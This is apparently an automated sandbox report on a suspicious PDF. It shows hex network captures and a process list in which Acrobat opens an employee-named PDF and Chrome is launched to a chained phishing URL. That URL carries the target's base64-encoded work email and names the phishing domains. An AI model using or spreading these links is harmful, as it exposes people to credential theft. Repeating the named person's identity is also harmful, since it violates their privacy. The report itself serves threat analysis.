                                                                                                                                                Data Ascii: w5i8jNCjxqXKlMjPzsmwzc3Sz6DXnLjD2eS3qNS2p97PzMbCpeauttLRsbrs7ff58s/e0PzUzgQFCujT19UC7+oD0O/R0ecB4BoLEQ38Bxfy3e702fAR4PH+FigGAuYAHAsOERQWCCcyEi0zEj0vHjEUPhMOGDYXARVDKwcdKChPPS9BDhIxIyEtNTY9MzgYWzViWBpDWCNoSGNAS0UqW09ZLlB1QmhMQi9LO0lLXnZ0dkxOUXV5RkOBg11Dd2J
                                                                                                                                                2024-10-28 16:49:24 UTC1369INData Raw: 36 75 6d 6b 72 6a 5a 7a 62 6d 62 6b 4b 65 71 6d 4b 37 64 6f 37 36 36 30 4d 4f 6e 75 4b 58 47 71 37 7a 67 75 65 36 39 33 71 2f 6b 76 73 71 75 72 38 6e 76 2b 50 62 55 38 50 6b 42 75 4f 54 37 31 64 7a 47 77 2f 54 30 33 75 59 43 41 4d 76 6d 30 52 41 4a 46 64 58 4d 33 2b 48 50 2b 42 7a 73 43 2f 49 55 48 69 44 31 41 2f 51 6e 2b 68 33 30 49 2b 6e 30 39 4e 38 73 41 76 6b 70 4e 43 38 75 4b 43 34 4f 2b 4f 38 6f 46 6a 51 4e 47 54 6a 2b 4b 2f 6f 62 49 68 51 30 42 41 67 5a 43 6a 6b 4a 52 42 64 41 4a 44 31 49 44 30 35 4a 56 31 42 4a 54 54 59 53 58 44 52 67 59 56 51 7a 49 6a 6f 32 56 46 52 53 52 43 4a 4c 59 30 70 4b 52 45 4a 4c 53 30 38 75 63 79 39 74 65 48 6c 48 4f 54 77 38 57 31 55 39 57 31 68 72 65 56 31 44 58 6c 68 67 68 6d 56 2f 5a 47 78 49 58 5a 47 52 58 48 79 49
                                                                                                                                                Data Ascii: 6umkrjZzbmbkKeqmK7do7660MOnuKXGq7zgue693q/kvsqur8nv+PbU8PkBuOT71dzGw/T03uYCAMvm0RAJFdXM3+HP+BzsC/IUHiD1A/Qn+h30I+n09N8sAvkpNC8uKC4O+O8oFjQNGTj+K/obIhQ0BAgZCjkJRBdAJD1ID05JV1BJTTYSXDRgYVQzIjo2VFRSRCJLY0pKREJLS08ucy9teHlHOTw8W1U9W1hreV1DXlhghmV/ZGxIXZGRXHyI
                                                                                                                                                2024-10-28 16:49:24 UTC1369INData Raw: 65 71 76 62 4f 37 72 36 48 69 74 65 57 36 74 4b 66 59 35 4d 4c 70 37 64 69 35 30 65 58 44 77 75 69 75 38 72 48 59 74 39 44 53 33 4c 6e 71 39 50 4b 39 74 4c 6f 43 77 63 54 42 42 2f 54 31 34 76 63 45 42 77 41 47 41 38 6a 6b 33 75 73 43 30 68 58 4c 35 2b 30 54 45 64 33 77 43 76 34 54 44 76 30 43 2b 2b 38 68 2b 4f 4c 70 42 51 41 66 2b 50 6a 76 48 2f 30 67 4c 4f 67 59 39 79 59 4b 47 7a 4d 4d 4c 7a 45 66 48 78 34 68 48 69 50 2b 4a 41 55 6d 4a 67 67 64 4b 30 4a 48 4d 43 64 48 48 42 4d 30 49 30 63 70 4c 6b 78 4f 58 6a 5a 67 50 53 39 42 4d 45 56 5a 52 45 51 31 56 45 67 32 51 55 70 47 59 44 31 65 54 6d 59 30 50 6c 4a 54 51 57 64 55 56 6b 56 65 58 55 74 75 50 47 46 51 54 44 78 61 5a 48 4e 33 61 57 68 5a 56 57 75 44 59 57 70 6e 59 46 32 49 62 59 75 44 64 33 64 54 65
                                                                                                                                                Data Ascii: eqvbO7r6HiteW6tKfY5MLp7di50eXDwuiu8rHYt9DS3Lnq9PK9tLoCwcTBB/T14vcEBwAGA8jk3usC0hXL5+0TEd3wCv4TDv0C++8h+OLpBQAf+PjvH/0gLOgY9yYKGzMMLzEfHx4hHiP+JAUmJggdK0JHMCdHHBM0I0cpLkxOXjZgPS9BMEVZREQ1VEg2QUpGYD1eTmY0PlJTQWdUVkVeXUtuPGFQTDxaZHN3aWhZVWuDYWpnYF2IbYuDd3dTe
                                                                                                                                                2024-10-28 16:49:24 UTC1369INData Raw: 72 6e 62 2b 64 33 72 47 7a 33 4c 75 6c 78 38 72 61 34 38 79 2b 78 36 33 57 30 75 72 41 30 50 6a 35 75 38 65 30 75 74 54 41 75 4f 77 45 74 39 45 47 30 74 45 49 39 4d 50 4d 35 52 48 4e 36 4f 6b 47 46 65 41 45 41 2f 58 74 35 66 7a 76 39 78 48 72 38 76 6b 55 42 66 58 2b 33 77 58 38 41 69 77 4e 49 41 67 4c 39 2b 62 38 43 67 76 79 39 53 67 6d 39 2b 73 34 4e 54 30 49 39 50 6f 56 46 6a 48 39 2f 69 4d 69 45 41 49 6b 41 6b 4d 57 47 45 45 67 43 69 77 76 50 30 67 78 49 79 77 53 4f 7a 64 50 4a 54 56 64 59 52 6f 69 59 43 77 67 50 54 35 68 4a 69 6b 68 54 45 41 34 4f 6b 42 47 4d 69 74 51 63 30 74 70 63 30 74 53 55 33 4e 48 55 33 46 7a 55 47 4e 66 67 31 42 62 65 32 56 61 59 6c 5a 4c 59 57 56 6d 69 55 35 52 67 57 65 56 56 6d 2b 52 6d 46 71 4d 6a 5a 35 65 6e 4a 35 30 62 4b
                                                                                                                                                Data Ascii: rnb+d3rGz3Lulx8ra48y+x63W0urA0Pj5u8e0utTAuOwEt9EG0tEI9MPM5RHN6OkGFeAEA/Xt5fzv9xHr8vkUBfX+3wX8AiwNIAgL9+b8Cgvy9Sgm9+s4NT0I9PoVFjH9/iMiEAIkAkMWGEEgCiwvP0gxIywSOzdPJTVdYRoiYCwgPT5hJikhTEA4OkBGMitQc0tpc0tSU3NHU3FzUGNfg1Bbe2VaYlZLYWVmiU5RgWeVVm+RmFqMjZ5enJ50bK
                                                                                                                                                2024-10-28 16:49:24 UTC1369INData Raw: 73 74 7a 74 6e 36 54 77 38 4c 44 76 78 76 57 31 7a 4b 33 35 77 39 48 6b 2f 62 7a 72 7a 72 66 42 41 4e 61 38 77 37 7a 66 32 4d 6b 49 31 67 72 4d 44 41 30 4f 30 42 44 75 7a 4e 54 75 43 64 48 59 43 50 72 54 33 50 55 68 48 74 50 59 44 53 62 76 2f 52 48 6e 36 53 67 48 35 4f 30 47 47 53 2f 77 36 41 67 46 39 53 51 68 4e 75 76 77 43 2f 54 39 46 6b 48 33 41 67 73 31 2f 41 59 30 45 30 59 4a 4f 42 39 4c 44 54 77 66 55 68 77 71 4d 31 49 56 44 53 73 51 47 56 63 53 48 42 30 56 4c 44 45 69 55 44 63 63 4a 6a 35 48 5a 69 70 6f 62 53 51 74 4e 32 46 76 4d 6b 70 78 63 7a 51 74 52 33 6f 73 4d 56 63 37 53 46 5a 70 67 45 41 35 54 7a 35 47 64 47 65 48 53 56 4e 39 69 30 35 38 61 30 70 53 6b 47 4f 55 56 6f 52 67 61 56 68 52 64 35 31 51 56 57 74 67 59 61 42 37 70 58 42 2b 65 36 5a
                                                                                                                                                Data Ascii: stztn6Tw8LDvxvW1zK35w9Hk/bzrzrfBANa8w7zf2MkI1grMDA0O0BDuzNTuCdHYCPrT3PUhHtPYDSbv/RHn6SgH5O0GGS/w6AgF9SQhNuvwC/T9FkH3Ags1/AY0E0YJOB9LDTwfUhwqM1IVDSsQGVcSHB0VLDEiUDccJj5HZipobSQtN2FvMkpxczQtR3osMVc7SFZpgEA5Tz5GdGeHSVN9i058a0pSkGOUVoRgaVhRd51QVWtgYaB7pXB+e6Z
                                                                                                                                                2024-10-28 16:49:24 UTC1369INData Raw: 37 76 41 76 4e 2f 56 36 65 48 4c 77 38 6a 30 74 74 33 57 37 76 6a 42 42 4e 2f 59 37 66 54 34 77 64 50 43 41 73 54 59 33 41 62 67 30 4d 6a 76 35 2f 4d 49 38 2b 77 43 43 51 33 56 33 51 30 61 38 50 37 35 44 74 33 77 39 42 37 34 45 69 6e 38 48 41 77 6a 4c 76 6f 53 45 43 73 76 2f 53 73 79 44 41 51 4a 4e 66 59 66 50 53 38 32 41 76 73 79 46 53 34 65 4d 30 51 55 47 51 59 48 49 7a 31 50 54 52 77 68 52 69 67 67 4a 52 59 54 51 6c 6c 4c 56 68 34 59 58 6a 46 4c 4f 6b 39 55 4d 44 55 33 49 7a 39 5a 61 32 51 34 50 45 68 45 52 79 78 52 59 44 5a 45 5a 54 4e 50 61 58 74 73 53 45 31 64 62 45 4a 51 62 6c 68 51 56 57 56 30 53 55 4e 35 52 32 4e 39 6a 34 74 63 59 58 47 41 56 55 2b 43 62 47 52 70 65 59 68 65 6b 6f 31 62 64 35 47 6a 6e 6e 42 31 68 5a 52 71 6e 70 61 41 65 48 32 4e
                                                                                                                                                Data Ascii: 7vAvN/V6eHLw8j0tt3W7vjBBN/Y7fT4wdPCAsTY3Abg0Mjv5/MI8+wCCQ3V3Q0a8P75Dt3w9B74Ein8HAwjLvoSECsv/SsyDAQJNfYfPS82AvsyFS4eM0QUGQYHIz1PTRwhRiggJRYTQllLVh4YXjFLOk9UMDU3Iz9Za2Q4PEhERyxRYDZEZTNPaXtsSE1dbEJQblhQVWV0SUN5R2N9j4tcYXGAVU+CbGRpeYheko1bd5GjnnB1hZRqnpaAeH2N


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                72192.168.2.1649807104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:49:25 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1575504935:1730132393:tsQBD6pnm-dRZ8ZlJHXvfJ9o3TZjLECqHOVZguSlcVA/8d9c6b17ae923aaf/phHrWSEgkaO_06F33lI9ffv1P4pt8rymxzOY4cyWB4A-1730134158-1.1.1.1-wYIAZ_Bbkih4o4C_Fy0JR15pEMzW4qdIapWRMtYWue1RH4VmlU8jz9iiZIiW1aSQ HTTP/1.1
                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                Accept: */*
                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:49:25 UTC379INHTTP/1.1 404 Not Found
                                                                                                                                                Date: Mon, 28 Oct 2024 16:49:25 GMT
                                                                                                                                                Content-Type: application/json
                                                                                                                                                Content-Length: 7
                                                                                                                                                Connection: close
                                                                                                                                                cf-chl-out: W0WIPBwFo1m8Dwq4ow6Q+pnq87protz7b7s=$RZKxkFcGXAsPF2Vq
                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8d9c6b448d8e2d2b-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                2024-10-28 16:49:25 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                Data Ascii: invalid


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                73192.168.2.164980835.190.80.1443
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:49:31 UTC530OUTOPTIONS /report/v4?s=%2F3BkEC3rDOUbHCOb8vJ9zUvIUIwXDLj7jyqvE8ewcIC0SRoZsPtWoVw3k3HThgIVzQXIG1uEY5cLwCetL1FOFv9dA2lG28aBhdTjI%2BHV0cf8ZhAo9KF9JkuAJ19nbg%3D%3D HTTP/1.1
                                                                                                                                                Host: a.nel.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Origin: https://8sq.w2agn.com
                                                                                                                                                Access-Control-Request-Method: POST
                                                                                                                                                Access-Control-Request-Headers: content-type
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:49:31 UTC336INHTTP/1.1 200 OK
                                                                                                                                                Content-Length: 0
                                                                                                                                                access-control-max-age: 86400
                                                                                                                                                access-control-allow-methods: POST, OPTIONS
                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                access-control-allow-headers: content-type, content-length
                                                                                                                                                date: Mon, 28 Oct 2024 16:49:30 GMT
                                                                                                                                                Via: 1.1 google
                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                Connection: close


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                74192.168.2.164980935.190.80.1443
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:49:31 UTC474OUTPOST /report/v4?s=%2F3BkEC3rDOUbHCOb8vJ9zUvIUIwXDLj7jyqvE8ewcIC0SRoZsPtWoVw3k3HThgIVzQXIG1uEY5cLwCetL1FOFv9dA2lG28aBhdTjI%2BHV0cf8ZhAo9KF9JkuAJ19nbg%3D%3D HTTP/1.1
                                                                                                                                                Host: a.nel.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Content-Length: 453
                                                                                                                                                Content-Type: application/reports+json
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:49:31 UTC453OUTData Raw: 5b 7b 22 61 67 65 22 3a 31 30 30 31 32 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 31 31 32 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 38 73 71 2e 77 32 61 67 6e 2e 63 6f 6d 2f 42 39 5a 36 34 48 43 5f 6f 4a 62 6b 76 53 6d 56 42 61 51 7a 66 6b 69 47 37 59 4e 64 2d 30 50 6f 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 36 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72
                                                                                                                                                Data Ascii: [{"age":10012,"body":{"elapsed_time":1112,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://8sq.w2agn.com/B9Z64HC_oJbkvSmVBaQzfkiG7YNd-0Po/","sampling_fraction":1.0,"server_ip":"188.114.96.3","status_code":404,"type":"http.err
                                                                                                                                                2024-10-28 16:49:32 UTC168INHTTP/1.1 200 OK
                                                                                                                                                Content-Length: 0
                                                                                                                                                date: Mon, 28 Oct 2024 16:49:31 GMT
                                                                                                                                                Via: 1.1 google
                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                Connection: close


                                                                                                                                                Click to jump to process

                                                                                                                                                Click to jump to process

                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                Click to jump to process

                                                                                                                                                Target ID:0
                                                                                                                                                Start time:12:47:24
                                                                                                                                                Start date:28/10/2024
                                                                                                                                                Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\renier_visser-In Employee -11384.pdf"
                                                                                                                                                Imagebase:0x7ff7d7830000
                                                                                                                                                File size:5'641'176 bytes
                                                                                                                                                MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:false

                                                                                                                                                Target ID:2
                                                                                                                                                Start time:12:47:25
                                                                                                                                                Start date:28/10/2024
                                                                                                                                                Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                                                                                Imagebase:0x7ff6ffc30000
                                                                                                                                                File size:3'581'912 bytes
                                                                                                                                                MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:false

                                                                                                                                                Target ID:4
                                                                                                                                                Start time:12:47:26
                                                                                                                                                Start date:28/10/2024
                                                                                                                                                Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2252 --field-trial-handle=1568,i,8438002774993098221,9784074526197564620,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                                                                                Imagebase:0x7ff6ffc30000
                                                                                                                                                File size:3'581'912 bytes
                                                                                                                                                MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:false

                                                                                                                                                Target ID:5
                                                                                                                                                Start time:12:47:26
                                                                                                                                                Start date:28/10/2024
                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://img2.leadong-edm.com/c/kdApfqMvoKJU/QLAfUpKvNfga/qpUKqIgnAGdz/jqAKUVFYiwcH?U=https://Vokbz-iamgold.mobile-pdfqronline.com/11384/#cmVuaWVyX3Zpc3NlckBpYW1nb2xkLmNvbQ==
                                                                                                                                                Imagebase:0x7ff7f9810000
                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:false

                                                                                                                                                Target ID:6
                                                                                                                                                Start time:12:47:26
                                                                                                                                                Start date:28/10/2024
                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 --field-trial-handle=2004,i,2892950466930992625,14663560579764141364,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                Imagebase:0x7ff7f9810000
                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:false

                                                                                                                                                No disassembly